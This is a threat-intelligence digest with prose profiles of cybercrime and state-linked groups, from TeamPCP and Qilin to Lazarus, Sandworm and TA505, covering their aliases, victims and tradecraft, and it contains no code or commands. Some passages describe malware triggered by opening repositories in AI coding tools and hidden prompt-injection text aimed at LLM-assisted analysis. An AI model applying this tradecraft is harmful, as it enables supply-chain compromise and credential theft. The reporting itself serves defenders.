Trending Adversaries

TeamPCP is a cybercrime threat actor associated with software supply chain attacks targeting open source ecosystems, developer tooling, CI/CD environments, and source code repositories. The group is described in the provided reporting as financially motivated and as having formally emerged in late 2025. Reported aliases include deadcatx3, pcpcat, persypcp, shellforce, team_pcp, and UNC6780. Across the cited reporting, TeamPCP is linked to the Mini Shai-Hulud malware/toolkit and broader Shai-Hulud activity, including later campaigns and variants such as Miasma. Multiple sources state that TeamPCP developed and then open-sourced Mini Shai-Hulud in May 2026, after which copycat activity complicated attribution for follow-on attacks. The group also reportedly announced a supply-chain attack contest on BreachForums tied to Shai-Hulud. Because Mini Shai-Hulud was publicly released, some later Miasma or Shai-Hulud-derived activity is linked to TeamPCP with varying confidence, and some reporting explicitly notes attribution uncertainty. The actor’s operations in the provided content center on compromising trusted software distribution and development workflows. Reported targets include npm and PyPI packages, GitHub repositories, GitHub Actions, open source projects, and organizations such as Microsoft, Red Hat, Aqua Security, Checkmarx, BerryAI/LiteLLM, Telnyx, Trivy, and KICS. TeamPCP is specifically tied in the content to the compromise of Microsoft’s durabletask Python package on PyPI, attacks against Trivy, KICS, LiteLLM, and Telnyx in March 2026, and claims of responsibility for a GitHub breach involving approximately 3,800 internal repositories. Observed tactics and techniques in the reporting include use of stolen GitHub Actions secrets and maintainer or contributor credentials; poisoning package registries; injecting malicious GitHub workflows; abusing GitHub OIDC tokens and trusted publishing paths; creating malicious pull requests and commits; deleting workflow logs; large-scale repository cloning; secret validation using TruffleHog; AWS reconnaissance; ECS Exec-based code execution in containers; exfiltration from repositories, cloud resources, and secrets stores; and malware delivery through malicious configuration files that execute when repositories are opened in AI coding tools or IDEs such as Claude Code, Gemini CLI, Cursor, and Visual Studio Code. The malware and tooling associated with TeamPCP in the content are described as credential-stealing and supply-chain focused. Mini Shai-Hulud and related activity targeted developer, cloud, package-publishing, Kubernetes, SSH, and CI/CD secrets. Reporting tied to TeamPCP also describes Linux-focused infostealer delivery via poisoned packages, theft of cloud credentials and developer tool configurations, and broader propagation through GitHub-based workflows and repositories. Sub-groups are not clearly established in the provided content, but Miasma, Mini Shai-Hulud, and Hades are described as related malware families, variants, or branches associated with or derived from TeamPCP-linked activity.

Qilin is a financially motivated ransomware-as-a-service (RaaS) operation. The content states it emerged in August 2022 under the name Agenda and is also referred to as Agenda, Gold Feather, Qilin Gang, Qilin Ransomware, Qilin Ransomware Gang, Qirin, and Water Galura. Reporting in the content says Qilin has claimed responsibility for nearly 400 victims on its dark web leak site. The group is linked in the content to ransomware intrusions and post-compromise activity, including at least one confirmed case involving a Qilin affiliate exploiting Check Point VPN vulnerability CVE-2026-50751. Check Point assessed that activity with medium confidence as tied to a Qilin affiliate based on use of the Qilin ransomware toolkit and binary analysis. In that campaign, the actor was described as financially motivated, targeted corporate VPN appliances for initial access, and was observed or suspected using dedicated VPS infrastructure, attempting to retrieve malicious ELF payloads, and possibly using the Tox protocol for communications. The same infrastructure was assessed as also probing or exploiting VPN vulnerabilities affecting Palo Alto, Fortinet, F5, and Check Point products. The content also links Qilin to the 2024 Synnovis ransomware attack, which crippled pathology services across south east London, forced hospitals to cancel thousands of appointments and operations, delayed blood testing and transfusion services, and led to publication of stolen patient data after extortion failed. The content states the outage later contributed to a patient death. Reported victim organizations named in the content include Yangfeng, Nissan, Asahi, Lee Enterprises, Synnovis, and Court Services Victoria.

ShinyHunters is a financially motivated data-theft and extortion threat actor active since at least 2019 and first publicly observed in January 2020. The group is also referenced in the provided content as bling_libra, shinyhunter, shiny_hunters, UNC6040, and UNC6240. The content describes ShinyHunters as an English-speaking cybercrime collective and associates it with the broader loosely connected criminal ecosystem known as "the Com." Public reporting cited in the content also notes analytical overlap or tactical similarities with Lapsus$ and Scattered Spider. Based on the provided material, ShinyHunters specializes in data theft and extortion rather than ransomware encryption. Multiple sources in the content state that the group uses a data leak site or "pay or leak" model and excludes encryption from the kill chain. The group is described as stealing data from large organizations, cloud platforms, software environments, and third-party integrators, then demanding payment to prevent public release. Reported tradecraft in the content includes social engineering, especially voice phishing, credential theft, and targeting SaaS and enterprise cloud platforms including Salesforce, Okta, Microsoft 365, SharePoint, OneDrive, Snowflake, GainSight, SalesLoft Drift, and Canvas-related environments. Victimology and incidents directly mentioned in the content include Instructure/Canvas, DentaQuest, Baker Distributing Company, BCD Travel, Carnival Cruise, Telus Digital, Oxford University via the Canvas incident, and other Salesforce customers, schools, colleges, and universities. In the May 2026 Instructure incident, ShinyHunters claimed to have stolen 3.65 TB of data affecting up to 9,000 institutions and 275 million records; the content states the group later escalated by defacing Canvas login portals at roughly 330 institutions and conducting direct school-by-school extortion. Instructure said the attackers exploited a vulnerability in its Free-for-Teacher account creation system and later reached an agreement with the actor, receiving shred logs as confirmation of destruction. In May and June 2026, the group also publicly claimed or leaked data from DentaQuest, Baker Distributing, and BCD Travel through its leak site. The content further states that ShinyHunters claimed responsibility for the Carnival incident and for a breach at Telus Digital. The content also references a Google Threat Intelligence report on the expansion of ShinyHunters-branded SaaS data theft and notes that the group has used the same playbook against Ticketmaster, AT&T, and other Salesforce customers. Overall, the provided material consistently characterizes ShinyHunters as a criminal extortion brand focused on SaaS and cloud data exfiltration, credential theft, leak-site pressure, and rapid monetization of stolen enterprise and customer data.

Silent Ransom Group (SRG) is a financially motivated cyber extortion group active since at least 2022. It is also tracked as UNC3753, Luna Moth, Chatty Spider, Storm-0252, and UNC3753. Reporting in the provided content describes the group as focused on data theft and extortion rather than file encryption, with historical reporting noting earlier ransomware deployment in 2022 before shifting to extortion-only operations. The group has targeted dozens of U.S.-based organizations, especially law firms and other legal, professional services, and financial services organizations. Additional reporting in the content also references targeting of insurance, healthcare, hospitality, accounting services, casino vendors, and other data-rich sectors. Multiple sources state that U.S.-based law firms have been a persistent priority target since 2023. Its tradecraft relies heavily on social engineering and legitimate remote access tooling. Reported initial access methods include benign invoice-themed or subscription-themed phishing emails, callback phishing, vishing, and direct phone calls in which operators impersonate internal IT help desk or security staff. Victims are persuaded to join screen-sharing sessions via Zoom, Microsoft Teams, Quick Assist, Microsoft Terminal Services, or similar tools, and then to install or use legitimate remote monitoring and management software including AnyDesk, Zoho Assist, Bomgar, SuperOps, Syncro, Splashtop, Atera, and RustDesk. The content also notes use of Privnote to deliver instructions and phishing domains patterned as <organization>-itdesk[.]com, <organization>-it[.]com, and <organization>-helpdesk[.]com. Once access is obtained, the group rapidly enumerates systems, mapped drives, cloud repositories, and document management platforms such as iManage, including via BYOD devices and enterprise VDI environments such as Windows 365 and Citrix. Reported data of interest includes contracts, client agreements, tax records, audit files, W-2/W-9/1099 records, Social Security numbers, personally identifiable information, merger and acquisition files, and other sensitive legal and financial documents. Exfiltration methods described in the content include WinSCP, Rclone, FTP, browser-based uploads to attacker-controlled cloud storage, victim email accounts, Google Drive, Microsoft OneDrive, and in some cases removable media. Multiple reports state the group often moves from initial contact to exfiltration and extortion within a single business day, and in some incidents in under an hour. The content also describes an unusual escalation to physical intrusion. FBI and Google reporting state that when remote social engineering fails, individuals linked to the group have appeared at victim offices posing as IT support staff, claiming they need to image devices or create backups, then inserting USB or other storage devices to steal data. Some reporting notes that formal attribution of every in-person incident was limited by forensic evidence, but assessed the activity as likely linked to UNC3753 based on overlaps in timing, structure, and targeting. After exfiltration, the group issues aggressive extortion demands, often within about 30 minutes of leaving the victim environment, typically giving victims three days to respond. Threats include public disclosure of stolen data, contacting employees, clients, partners, customers, or media, and publication on its leak infrastructure. The content references the LEAKEDDATA branding and the leak site business-data-leaks[.]com, with reporting that the group used the LeakedData name publicly until December 2024 and that close to 100 victim organizations were listed by June 2026. The provided content also links Silent Ransom Group to the broader Conti ecosystem, with overlaps to UNC2686 and earlier BazarCall-style tradecraft. Some reporting explicitly describes the group as a Conti offshoot or as emerging after Conti’s 2022 collapse. Resecurity reporting in the content further states that the group uses fast-flux infrastructure backed by rotating residential IP space and compromised routers/modems across multiple countries to support its leak infrastructure and resist takedown.

NSO Group is an Israeli spyware company and private sector offensive actor known for developing Pegasus spyware; it is also referred to in the content as NSO, Pegasus, and Q Cyber Technologies. Microsoft maps NSO Group to Night Tsunami (formerly DEV-0336) in its private sector offensive actor taxonomy. The group is repeatedly linked to surveillance operations and exploit development targeting mobile devices and messaging platforms. Reported targets in the content include WhatsApp users, Apple users, journalists, human rights activists and defenders, lawyers, political dissidents, diplomats, government officials, military personnel, humanitarian workers, and other civil society members. The content directly links NSO Group to multiple Pegasus delivery and exploitation methods. These include the 2019 WhatsApp zero-click campaign exploiting CVE-2019-3568 / a WhatsApp audio-calling or VOIP stack vulnerability to compromise approximately 1,400 users; one-click and spear-phishing campaigns using malicious links and social engineering; iMessage-based zero-click exploitation associated with the ForcedEntry exploit and CVE-2021-30860; and a reported mobile-network technique referred to as "MMS Fingerprint" for device and OS fingerprinting without user interaction. Pegasus is described in the content as spyware or a remote access trojan capable of extracting messages, calls, photos, location data, contacts, browser history, screenshots, passwords, and communications from apps, and of activating cameras and microphones. The content states that WhatsApp/Meta sued NSO Group in 2019 over abuse of WhatsApp infrastructure to deliver Pegasus, that courts found NSO Group violated U.S. hacking laws, and that a permanent injunction barred NSO Group from targeting WhatsApp and its users. Despite that, Meta and WhatsApp said they later detected and disrupted additional NSO-linked social engineering and spear-phishing activity involving malicious external links, as well as test accounts and groups on WhatsApp, with reported targeting of a small number of users in Jordan and Lebanon. The content also states that Apple sued NSO Group, alleging Pegasus was used to attack a small number of Apple users worldwide. NSO Group is described in the content as being on the U.S. Commerce Department Entity List / blacklist for activity found contrary to U.S. national security or foreign policy interests. Known aliases and related names directly mentioned in the content include NSO, Pegasus, Q Cyber Technologies, Q Suite, and Microsoft’s Night Tsunami / DEV-0336 designation.

Contagious Interview is a North Korea-aligned threat actor/campaign cluster focused on software developers, especially those connected to cryptocurrency projects and digital financial platforms. It is also tracked under aliases including UNC5342, Famous Chollima, Void Dokkaebi, DeceptiveDevelopment, BeaverTail, InvisibleFerret, OtterCookie, DEV#POPPER, Gwisin Gang, and Tenacious Pungsan. The reporting directly associates it with DPRK activity and repeatedly describes it as targeting developers through fake job interviews, recruiter outreach, coding assignments, code review requests, and compromised open-source packages. Across the cited reporting, the cluster targets developers globally, with repeated emphasis on cryptocurrency, DeFi, finance, technology, education, and business services. Observed objectives include theft of credentials, browser data, cryptocurrency wallets, seed phrases, private keys, cookies, keychain/keyring material, SSH keys, Telegram sessions, and other sensitive developer or enterprise data. Some reporting also links stolen data and identities to North Korean fraudulent IT worker schemes. Tradecraft directly mentioned in the content includes social engineering via fake recruiter personas and job-interview lures; malicious GitHub and GitLab repositories; trojanized coding challenges; compromised npm and Packagist packages; hidden VS Code task execution via .vscode/tasks.json; malicious VSIX extensions for persistence; and blockchain-based dead-drop or command-and-control techniques using networks such as TRON, Aptos, BNB Smart Chain, Ethereum, Base, and Optimism. Malware and tooling associated in the content include BeaverTail, InvisibleFerret, OtterCookie, DEV#POPPER, MicrosoftSystem64, Tropidoor, TsunamiKit, and activity overlaps involving Overlord-derived tooling in related clusters. Additional techniques described include obfuscated JavaScript loaders, hexadecimal string encoding, XOR-encrypted payload retrieval, eval()-based execution, browser and wallet theft, fake password prompts, keychain and GNOME Keyring dumping, Windows DPAPI/App-Bound Encryption bypass, and persistence through scheduled tasks, LaunchAgents, systemd services, or malicious editor extensions. The content also notes subgroup or related-cluster distinctions. Proofpoint observed strong overlaps between UNK_DeadDrop and Contagious Interview in victimology, social engineering, and cryptocurrency theft, but tracked UNK_DeadDrop separately due to lack of direct infrastructure overlap and differences in delivery and payloads. Elastic reporting states PHANTOMPULSE aligns with DPRK-linked crypto-targeting clusters including Lazarus, BlueNoroff, UNC5342/Contagious Interview, and APT38. ESET reporting states DeceptiveDevelopment overlaps with Contagious Interview and WageMole, and CrowdStrike tracks a related gang as Famous Chollima.

LockBit is a financially motivated ransomware-as-a-service (RaaS) operation and cybercriminal group, widely referenced as one of the most active and destructive ransomware groups globally. The content states LockBit first appeared around January 2020 and, between January 2020 and February 2024, attacked more than 2,500 victims in at least 120 countries, including about 1,800 in the United States. Reported victims included individuals, small businesses, multinational corporations, hospitals, schools, nonprofit organizations, critical infrastructure, and government and law-enforcement agencies. The group extorted at least approximately $500 million in ransom payments and caused billions of dollars in additional losses. LockBit operated as a RaaS model in which the administrator recruited affiliates to conduct intrusions, steal data, encrypt systems, and threaten publication of stolen data on LockBit-controlled leak sites if victims did not pay. The content states the administrator typically received 20% of each ransom payment and affiliates received 80%. LockBit is described as using double extortion and maintaining public leak infrastructure. The group has been associated in the content with use of Mimikatz and PsExec, abuse of legitimate remote administration tools such as AnyDesk for persistence and GoToResolve in campaigns linked to LockBit operations, and targeting of VMware ESXi environments. The content also notes LockBit affiliates unlawfully accessed vulnerable systems, stole data, encrypted stored data, and communicated with victims using infrastructure including email addresses, IP addresses, and online accounts. The content identifies Dmitry Yuryevich Khoroshev, also known as LockBitSupp, LockBit, and putinkrab, as the alleged creator, developer, administrator, and public spokesperson of LockBit from as early as September 2019 through 2024. It also names charged or identified affiliates and participants including Ruslan Magomedovich Astamirov and Mikhail Vasiliev, and references Mikhail Matveev as an affiliate of LockBit and other ransomware groups. Astamirov used the aliases BETTERPAY, offtitan, and Eastfarmer. Vasiliev used the aliases Ghostrider, Free, Digitalocean90, Digitalocean99, Digitalwaters99, and Newwave110. The group is repeatedly described in the content as Russia-based or Russian-speaking. One source states multiple ransomware groups including LockBit 2.0/3.0 are based in Russia, and another notes LockBit operators expressly prohibit affiliates from targeting Russian and other CIS organizations. The content also states LockBit remained neutral in the Russia-Ukraine conflict while some other ransomware gangs sided with Russia. Known aliases and variants directly referenced in the content include LockBit 2.0, LockBit 3.0, LockBit Black, LockBit Green, LockBit 4.0, LockBit 5.0, LockBit Gang, LockBit Group, and LockBitSupp. The content also references versioned naming such as LockBit 2.0/3.0 and specifically identifies LockBit 3.0 in connection with attacks on healthcare. Law enforcement significantly disrupted LockBit in February 2024 through Operation Cronos, led by the U.K. National Crime Agency with support from the U.S. DOJ, FBI, and international partners. Authorities seized LockBit websites and servers, developed decryption capabilities for victims, and the disruption significantly diminished the group’s reputation and operational capacity. However, the content states LockBit restarted operations about a week later, stood up new leak sites, and used updated encryptors and ransom notes. The content also states that seized infrastructure showed stolen victim data had been retained even after ransom payments and promises of deletion.

TA4922 is a Chinese-speaking, likely East Asia-based threat actor tracked by Proofpoint since spring 2025 and assessed as primarily financially motivated. Proofpoint describes the group as a cybercrime operation rather than an espionage actor, although it notes overlap in tooling, infrastructure, and social engineering with Silver Fox and Void Arachne, and some malware capabilities could support surveillance. TA4922’s objectives are reported as obtaining remote access for monetization, including fraud, data theft, access brokering or resale, and persistence. TA4922 historically targeted organizations in East Asia, especially Japan, and has also targeted Taiwan, South Korea, Singapore, Malaysia, Indonesia, India, and Italy. By early 2026 it expanded targeting into Europe and Africa, including the United Kingdom, Germany, Italy, and South Africa. Proofpoint reported that the actor maintains a very high operational tempo and conducts more unique campaigns than any other cybercrime actor in its tracking. The actor relies heavily on localized phishing and impersonation. Observed lures include tax authority, payroll, HR, salary adjustment, benefits, compliance, invoice, and general business themes, often written in local languages and dialects. TA4922 also attempts to move victims from email to out-of-band platforms including LINE, WhatsApp, and Microsoft Teams to continue social engineering, harvest contact information, and deliver malware outside normal email security visibility. Proofpoint also observed tax-themed campaigns in which TA4922 impersonated national tax authorities, requested phone numbers, and then escalated contact by impersonating finance leadership. TA4922 uses diverse delivery and execution chains, including malicious links, archive attachments, cloud-hosted files, shortened URLs, direct executables, credential-phishing pages, DLL sideloading, and abuse of legitimate remote monitoring and management tools such as AnyDesk and SyncFuture. The group has used sender infrastructure at scale, including thousands of disposable sender addresses, often via Outlook, Hotmail, and Gmail accounts. Malware associated with TA4922 includes ValleyRAT/Winos4.0, Atlas RAT, RomulusLoader, and SilentRunLoader. ValleyRAT is described as part of the Winos4.0 ecosystem and provides full remote access functionality; Proofpoint also observed a heavily modified Winos4.0 variant in early 2026. Atlas RAT is a modular backdoor used against higher-value targets with capabilities including system reconnaissance, arbitrary command execution, file upload and management, plugin and payload loading, keylogging, screenshot capture, clipboard theft, audio recording, webcam capture, and system shutdown or reboot. Atlas RAT also performs anti-sandbox and anti-analysis checks. RomulusLoader is a C-based loader used to download and execute follow-on payloads and to deploy legitimate RMM software. Reported behaviors include masquerading as legitimate components such as Vulkan Graphics API or AnyDesk utilities, DLL sideloading, persistence via common system directories, shellcode execution, process injection into legitimate processes such as svchost.exe and dllhost.exe, process hollowing, and download-and-execute functionality. SilentRunLoader is a compiled Python-based loader and stealer focused on Google Chrome data theft. It harvests stored credentials, cookies, and browsing history, archives the data, and uploads it to actor-controlled infrastructure. Proofpoint assessed with high confidence that TA4922 likely uses large language models to accelerate development of some newer Python malware, citing placeholder values and coding artifacts in SilentRunLoader. Known aliases and related names mentioned in reporting include ValleyRAT/Winos4.0, Atlas RAT/AtlasCross RAT, and ecosystem overlap with Silver Fox and Void Arachne. Proofpoint tracks TA4922 as a distinct threat cluster.

Conti was a Russia-linked ransomware-as-a-service operation and cybercrime syndicate active from 2020 until its apparent disbanding in 2022. The group was responsible for large-scale double-extortion ransomware attacks, stealing data before encrypting systems and threatening to publish stolen information on its leak site. U.S. government reporting cited more than 400 attacks between spring 2020 and spring 2021, mostly against U.S. organizations, and later described Conti as the costliest ransomware strain on record, with more than 1,000 victims and over $150 million in payouts as of January 2022. Reported victims and target sectors included healthcare, first-responder networks, public-sector entities, law enforcement, emergency medical services, and the government of Costa Rica; the group also attacked Ireland’s Health Service Executive and organizations in New Zealand. The group operated as a business-like RaaS enterprise with core operators and affiliates. Leaked internal chats and source code exposed its organizational structure, bitcoin addresses, law-enforcement evasion, attack methods, administrative panel, BazarBackdoor API, and ransomware encryptor, decryptor, and builder. Reporting also linked Conti to the broader TrickBot/BazarBackdoor ecosystem, and campaigns identified by Google and others tied Conti-associated activity to BazarCall and Diavol. In March 2022, Google reported on BUMBLEBEE as malware linked to Conti’s initial access broker. Conti publicly declared support for the Russian government after the invasion of Ukraine in February 2022, later revising its statement while still threatening retaliation. Multiple sources in the content describe the group as based in Russia or Russia-linked, and one source characterizes it as a Russian government-linked RaaS operation. Following its political stance, a Ukrainian researcher leaked extensive internal Conti communications and source code, causing major reputational and operational damage. The group shut down internal infrastructure in May 2022 and appears to have disbanded in 2022. The content states that former Conti members and affiliates shifted into successor or offshoot groups including Black Basta, Royal, UNC3753 / Silent Ransom Group / Luna Moth / Chatty Spider, UNC2686, Quantum, Hive, and ALPHV. Black Basta is described as a successor to Conti, Royal as a direct successor, and UNC3753 and UNC2686 as offshoots of the now-defunct Conti ransomware gang.

Sandworm is a Russia-aligned threat actor identified in the content as APT44 and GRU Unit 74455, and described as an offensive cyber unit within Russia’s military intelligence service GRU. Reported aliases in the provided content include Seashell Blizzard, TeleBots, BlackEnergy, Electrum, Iridium, Iron Viking, Blue Echidna, FrozenBarents, Voodoo Bear, and Unit 74455. The content links Sandworm to destructive and disruptive operations against Ukraine and other targets, especially critical infrastructure and energy organizations. It attributes to Sandworm the 2015 Ukraine power outage using BlackEnergy 3 to access a Ukrainian power company network and pivot to SCADA systems; the 2016 Ukraine Electric Power Attack, where the group used WMI for remote execution and system surveys, PowerShell scripts to run a credential-harvesting tool in memory, xp_cmdshell in MS-SQL, and LDAP queries against Active Directory; the 2018 Olympic Destroyer attack against the PyeongChang Winter Olympics, which disrupted Wi‑Fi, ticketing systems, the official app, and the event website; the 2022 attempted attack on a Ukrainian energy company using Industroyer2 and the wipers CaddyWiper, Orcshred, Soloshred, and Awfulshred; and use of Prestige to delete backup catalogs and volume shadow copies. The content also states Sandworm exploited CVE-2014-4114/CVE-2014-6352, may have exploited Follina (CVE-2022-30190) against more than 500 Ukrainian media recipients with medium confidence, and has been reported exploiting CVE-2025-8088 alongside other Russia-aligned actors. Additional tradecraft directly mentioned includes use of BLACKENERGY 3 malware, Telegram Bot API for command and control, abuse of legitimate M.E.Doc update requests and putdrive.com for payload hosting and C2, exfiltration of internal documents and files, naming a malicious binary explorer.exe to evade detection, use of Impacket WMIexec for remote code execution, VBScript to run WMI queries, browser credential theft via CredRaptor, and modification of in-registry internet settings to lower internet security. The content also notes Sandworm intensified destructive activity in winter 2025–2026, deploying several new wipers in Ukraine against governmental and private-sector targets, and attributes with medium confidence a December 2025 data-destruction incident affecting a Polish energy company to Sandworm.

Handala is an Iranian-linked threat actor widely assessed by the FBI, the U.S. Department of Justice, and multiple commercial threat intelligence firms to be a front for Iran’s Ministry of Intelligence and Security (MOIS). It is also tracked as Void Manticore, Red Sandstorm, Storm-0842, Banished Kitten, Dune, Homeland Justice, Handala Hack Team, and Handala Hack Team/Handala Popular Resistance Front (HPRF) in related reporting. Content also describes Void Manticore personas including Handala Hack Team, KarmaBelow, and Homeland Justice. The group presents itself as an independent pro-Palestinian or hacktivist actor, but the provided reporting consistently links it to MOIS. Since late 2023, Handala has used Telegram and hack-and-leak branding to target Israeli officials, government agencies, security institutions, technology companies, critical infrastructure, and, increasingly, U.S. targets. Reported targets include Israeli leadership, Israeli police databases, security organizations, technology companies, nuclear-related entities, Iran International, U.S. government personnel, U.S. Marine Corps personnel, county government infrastructure, and Stryker, a U.S. medical technology company. Confirmed or reported capabilities in the provided content include hack-and-leak operations, credential theft, abuse of legitimate enterprise management tools, ransomware used primarily for psychological impact rather than extortion, destructive wiper activity, and lateral movement via RDP. In the March 11, 2026 Stryker attack, Handala/Void Manticore reportedly compromised Microsoft Intune administration, created a Global Administrator account, and used Intune remote wipe functionality to erase large numbers of devices; Stryker stated the incident was contained to its internal Microsoft environment and did not affect medical products. The content also states that Void Manticore collected cached data and files from victim environments. The actor has also made public claims of operations against Israeli military and civilian targets during the 2026 Iran-Israel conflict, including alleged disruption of radar or signal networks and attacks on Kfar Yona municipality, but the provided reporting says those specific June 2026 radar-related claims were unsubstantiated or exaggerated and that the evidence published appeared consistent with access to a Tadiran Telecom Aeonix IVR/telephone administration panel rather than military radar infrastructure. The content further states that MOIS has likely expanded the Handala brand beyond cyber operations to encompass influence and physical-threat activity targeting U.S. and Israeli interests. Under the Handala brand, HPRF and related personas allegedly solicited individuals for espionage and physical attacks for payment, and HPRF claimed responsibility for an April 26, 2026 arson attack targeting an Israeli law enforcement official’s vehicle. Reporting cited here assesses that MOIS is using the Handala brand as a reusable operational persona spanning cyber, influence, espionage, and physical threat activity.

Miasma is a self-replicating software supply chain threat cluster assessed in the provided reporting as a variant or rebrand of Mini Shai-Hulud, with Hades described as its latest evolution. The activity has targeted npm and PyPI ecosystems and also extended to direct compromise of GitHub repositories. Reported victims and targets include developer workstations, CI/CD environments, Microsoft-owned GitHub repositories, the @redhat-cloud-services npm namespace, and packages in computational biology, bioinformatics, genotype-phenotype analysis, MCP/AI-themed ecosystems, and widely used components such as ensmallen and durabletask. Known related clusters and aliases mentioned in the content are Mini Shai-Hulud and Hades. Across the reporting, Miasma is described as using self-replicating worm behavior, malicious package publication through legitimate authenticated channels, and GitHub repository abuse for propagation. Observed techniques include trojanized npm and PyPI packages; Python .pth startup hooks; malicious native extension import triggers; obfuscated Bun/JavaScript payloads hidden behind eval-based obfuscation and substitution ciphers; execution on folder access in IDEs or by AI agents; direct repository backdooring to trigger through Claude Code, Gemini CLI, Cursor, VS Code, and npm test scripts; multi-cloud credential sweeps; Linux process memory scanning and reading; cross-platform memory scraping; SSH/SCP-based lateral movement; GitHub Actions workflow abuse; OIDC trusted publishing abuse to mint package publishing tokens; and persistence via background services. The malware is also reported to embed fake prompt-injection text or hidden prompts intended to disrupt LLM-assisted analysis and triage. The payloads described in the content steal secrets from developer and CI/CD environments, including GitHub, npm, PyPI, RubyGems, and JFrog tokens; AWS, Azure, and GCP credentials; Kubernetes material; SSH keys; Docker configurations; shell histories; .env files; and AI developer tool configurations. Reporting also states that Miasma creates public GitHub repositories and commits harvested secrets into victim-owned or attacker-controlled repositories for exfiltration and propagation. The latest Hades evolution is additionally described as including wiper capability tied to token revocation monitoring. The content characterizes this activity as an ongoing, fast-moving, mass-propagating supply chain campaign that abuses the trust model of open-source package registries and code hosting platforms rather than exploiting platform vulnerabilities.

Lazarus Group is a DPRK- and North Korea state-sponsored threat actor associated with financially motivated and espionage activity, especially against cryptocurrency, financial, and developer ecosystems. Known aliases in the provided content include APT-C-26, BadClone, Black Artemis, Copernicium, Diamond Sleet, Genie Spider, Guardians of Peace, Hidden Cobra, Labyrinth Chollima, Lazarus APT, Lazarus Group, Nickel Academy, Nickel Gladstone, Pukchong, PurpleBravo, Selective Pisces, Stardust Chollima, Storm-0139, Storm-0954, Storm-1222, Storm-1877, TA404, TAG-121, TempHermit, UNC2970, WaterPlum, and Zinc. The content also references related or overlapping DPRK-linked clusters and subgroups including BlueNoroff, APT38, TraderTraitor/UNC4899, AppleJeus, Citrine Sleet/UNC4736, Gleaming Pisces, and DeceptiveDevelopment. In the provided reporting, Lazarus is linked to major cryptocurrency theft and laundering operations, including attribution for the February 2025 Bybit theft exceeding $1.4 billion after compromise of the Safe{Wallet} transaction approval workflow and malicious JavaScript injection into the Safe web interface. The content also states that TraderTraitor, tracked as UNC4899 and described as part of the broader Lazarus Group, was attributed in LayerZero reporting to a roughly $292 million Kelp DAO/LayerZero bridge exploit and tied to a parallel Drift heist. The reporting further states that the Lazarus umbrella within North Korea’s Reconnaissance General Bureau accounts for much of North Korean state-backed crypto theft. The actor is also described as targeting software supply chains and developers. Sonatype reporting in the content tracks a Lazarus Group npm campaign using dozens of malicious packages and brandjacking techniques such as suffix addition, embedding, version mimicry, and typosquatting. In that campaign, malicious packages such as buffer-utilities acted as droppers for Node.js backdoor and downloader payloads that collected host information, contacted command-and-control infrastructure, created hidden .vscode directories, downloaded additional payloads, and executed attacker-controlled code. ESET reporting in the content also states that Lazarus continued Operation DreamJob targeting European drone manufacturers and that Operation DangerousPassword led to compromise of the axios JavaScript library on npm through a maintainer account compromise. The content links Lazarus or Lazarus-aligned activity to advanced malware and intrusion tradecraft used against cryptocurrency and financial targets. Elastic reporting states that PHANTOMPULSE, a final-stage RAT in the REF6598 intrusion chain targeting the cryptocurrency sector, aligns closely with DPRK-linked clusters including Lazarus, BlueNoroff, UNC5342/Contagious Interview, and APT38. PHANTOMPULSE is described as using blockchain-based command and control via Blockscout-accessible Ethereum, Base, and Optimism data; AMSI, WLDP, and ETW bypasses using hardware breakpoints and a vectored exception handler; direct-syscall techniques; UAC bypass; and multiple process injection methods including module stomping, Debug API-driven execution, and manual DLL mapping. The malware also performs reconnaissance, persistence via scheduled tasks, screenshot capture, keylogging, clipboard monitoring, and targeting of cryptocurrency wallets and messaging applications. Separate reporting in the content documents a Lazarus-linked memory-only malware ecosystem composed of DPAPILoader, RemotePELoader, and RemotePE, targeting financial and cryptocurrency organizations. This framework uses victim-specific DPAPI decryption, reflective PE loading, direct-syscall techniques including HellsGate/TartarusGate, remapping of clean DLLs to evade user-mode hooks, ETW suppression, encrypted in-memory execution, and actor-in-the-loop payload delivery. Fox-IT reporting says this activity overlaps with AppleJeus and Gleaming Pisces and reflects a transition from older Lazarus tooling such as ThemeForestRAT and PondRAT to a stealthier memory-only toolset designed for long-duration access, data theft, financial fraud, and large-scale financial heists.

TA505 is a financially motivated cybercrime threat actor active since at least 2014. The content links TA505 with the Cl0p/Clop ransomware and extortion operation and notes aliases including FIN11, Hive0065, Graceful Spider, Gold Tahoe, Monty Spider, Spandex Tempest, and Lace Tempest. The group has historically delivered malware including Dridex, TrickBot, Locky, Clop/Cryptomix, MINEBRIDGE, and SDBbot, and more recently has conducted targeted attacks across North America, Asia, Africa, and South America. Observed tradecraft in the provided content includes spear-phishing and malicious spam, including lures impersonating Onehub and HR representatives; macro-enabled Office documents; JavaScript-based execution; PowerShell for malware delivery, reconnaissance, and command execution; use of cmd.exe; disabling Windows Defender and other security products; credential theft; and use of tools such as AdFind, BloodHound, Mimikatz, PowerSploit, and PingCastle. IBM X-Force linked Hive0065/TA505 activity to campaigns using spoofed cloud-storage infrastructure, custom DLL payloads with Cobalt Strike-like code, Meterpreter components, and the SDBbot RAT. SDBbot is described as a second-stage payload used for remote control, command execution, video recording, data exfiltration, persistence, and delivery of additional payloads. The content also associates TA505/Cl0p with exploitation of managed file transfer and enterprise application vulnerabilities for large-scale data theft and extortion. Specifically mentioned are exploitation of SolarWinds Serv-U CVE-2021-35211, MOVEit Transfer CVE-2023-34362, Cleo Harmony/VLTrader/LexiCom CVE-2024-50623 and CVE-2024-55956, and Oracle E-Business Suite CVE-2025-61882. In the Serv-U intrusions, attackers exploited the server to execute commands, deployed Cobalt Strike via PowerShell, performed reconnaissance and lateral movement, and established persistence by hijacking the RegIdleBackup scheduled task to load FlawedGrace RAT. The content further states that Cl0p has specialized since 2020 in exploiting previously unknown vulnerabilities in secure file transfer platforms, including earlier Accellion FTA and GoAnywhere MFT campaigns. The provided reporting characterizes Cl0p/TA505 as emphasizing data theft and extortion, often without encryption, in campaigns such as GoAnywhere and MOVEit. Victims are pressured through delayed extortion emails and publication on the group’s leak site. The content does not provide high-confidence evidence that TA505 is a nation-state actor; it consistently describes the group as financially motivated cybercrime.

